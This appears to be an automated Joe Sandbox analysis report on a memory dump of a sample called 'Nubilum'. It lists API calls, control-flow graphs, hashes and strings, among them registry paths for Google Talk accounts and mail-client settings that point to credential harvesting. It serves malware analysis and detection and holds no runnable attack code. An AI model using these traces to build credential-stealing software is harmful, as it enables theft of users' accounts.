                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadMessageProc
                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                          • API String ID: 2780580303-317687271
                          • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                          • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                          • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                          • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 358 4034e4-403544 memset * 2 call 410b1e 361 403580-403582 358->361 362 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 358->362 362->361
                          APIs
                          • memset.MSVCRT ref: 00403504
                          • memset.MSVCRT ref: 0040351A
                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                          • _mbscpy.MSVCRT ref: 00403555
                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                          • _mbscat.MSVCRT ref: 0040356D
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _mbscatmemset$Close_mbscpystrlen
                          • String ID: InstallPath$Software\Group Mail$fb.dat
                          • API String ID: 3071782539-966475738
                          • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                          • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                          • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                          • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 367 40ccd7-40cd06 ??2@YAPAXI@Z 368 40cd08-40cd0d 367->368 369 40cd0f 367->369 370 40cd11-40cd24 ??2@YAPAXI@Z 368->370 369->370 371 40cd26-40cd2d call 404025 370->371 372 40cd2f 370->372 374 40cd31-40cd57 371->374 372->374 376 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 374->376 377 40cd59-40cd60 DeleteObject 374->377 377->376
                          APIs
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                          • String ID:
                          • API String ID: 2054149589-0
                          • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                          • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                          • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                          • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 384 44b40e-44b415 GetModuleHandleA 385 44b455 384->385 386 44b417-44b426 call 44b42b 384->386 388 44b457-44b45b 385->388 395 44b48d 386->395 396 44b428-44b433 GetProcAddress 386->396 390 44b45d-44b465 GetModuleHandleA 388->390 391 44b49a call 44b49f 388->391 394 44b467-44b46f 390->394 394->394 397 44b471-44b474 394->397 399 44b48e-44b496 395->399 396->385 400 44b435-44b442 VirtualProtect 396->400 397->388 398 44b476-44b478 397->398 401 44b47e-44b486 398->401 402 44b47a-44b47c 398->402 408 44b498 399->408 404 44b454 400->404 405 44b444-44b452 VirtualProtect 400->405 406 44b487-44b488 GetProcAddress 401->406 402->406 404->385 405->404 406->395 408->397
                          APIs
                          • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                          • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                            • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                            • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                            • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

                          Control-flow Graph

                          APIs
                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                            • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                            • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                          • memset.MSVCRT ref: 00408620
                            • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                          • memset.MSVCRT ref: 00408671
                          • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                          • RegCloseKey.ADVAPI32(?), ref: 004086D6
                          Strings
                          • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                          • String ID: Software\Google\Google Talk\Accounts
                          • API String ID: 1366857005-1079885057
                          • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                          • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                          • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                          • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 432 40ba28-40ba3a 433 40ba87-40ba9b call 406c62 432->433 434 40ba3c-40ba52 call 407e20 _mbsicmp 432->434 456 40ba9d call 4107f1 433->456 457 40ba9d call 404734 433->457 458 40ba9d call 404785 433->458 459 40ba9d call 403c16 433->459 460 40ba9d call 410a9c 433->460 439 40ba54-40ba6d call 407e20 434->439 440 40ba7b-40ba85 434->440 446 40ba74 439->446 447 40ba6f-40ba72 439->447 440->433 440->434 442 40baa0-40bab3 call 407e30 448 40bab5-40bac1 442->448 449 40bafa-40bb09 SetCursor 442->449 450 40ba75-40ba76 call 40b5e5 446->450 447->450 451 40bac3-40bace 448->451 452 40bad8-40baf7 qsort 448->452 450->440 451->452 452->449 456->442 457->442 458->442 459->442 460->442
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Cursor_mbsicmpqsort
                          • String ID: /nosort$/sort
                          • API String ID: 882979914-1578091866
                          • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                          • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                          • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                          • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                          APIs
                          • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                            • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                            • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                            • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                            • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                          APIs
                          • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                          • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressProcProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 2152742572-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                          APIs
                            • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,771B0A60,?,00000000), ref: 00410D1C
                            • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                          • memset.MSVCRT ref: 00410E10
                          • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                          • _mbscpy.MSVCRT ref: 00410E87
                            • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                          Strings
                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                          • API String ID: 889583718-2036018995
                          • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                          • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                          • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                          • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                          APIs
                          • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                          • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                          • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                          • LockResource.KERNEL32(00000000), ref: 00410CA1
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLockSizeof
                          • String ID:
                          • API String ID: 3473537107-0
                          • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                          • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                          • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                          • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                          APIs
                          • memset.MSVCRT ref: 004109F7
                            • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                            • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                          • memset.MSVCRT ref: 00410A32
                          • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                          • String ID:
                          • API String ID: 3143880245-0
                          • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                          • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                          • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                          • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                          APIs
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                          • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                          • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                          • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                          APIs
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??2@
                          • String ID:
                          • API String ID: 1033339047-0
                          • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                          • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                          • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                          • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                          APIs
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@mallocmemcpy
                          • String ID:
                          • API String ID: 3831604043-0
                          • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                          • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                          • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                          • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                          APIs
                            • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                            • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                          • CreateFontIndirectA.GDI32(?), ref: 004070A6
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: CreateFontIndirect_mbscpymemset
                          • String ID: Arial
                          • API String ID: 3853255127-493054409
                          • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                          • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                          • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                          • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                          APIs
                            • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                          • _strcmpi.MSVCRT ref: 0040CEC3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: strlen$_strcmpimemset
                          • String ID: /stext
                          • API String ID: 520177685-3817206916
                          • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                          • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                          • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                          • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                          APIs
                            • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                          • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID:
                          • API String ID: 145871493-0
                          • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                          • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                          • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                          • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                          APIs
                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                            • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                            • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                            • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: PrivateProfile$StringWrite_itoamemset
                          • String ID:
                          • API String ID: 4165544737-0
                          • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                          • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                          • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                          • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                          APIs
                          • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                          • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                          • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                          • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                          APIs
                          • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                          • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
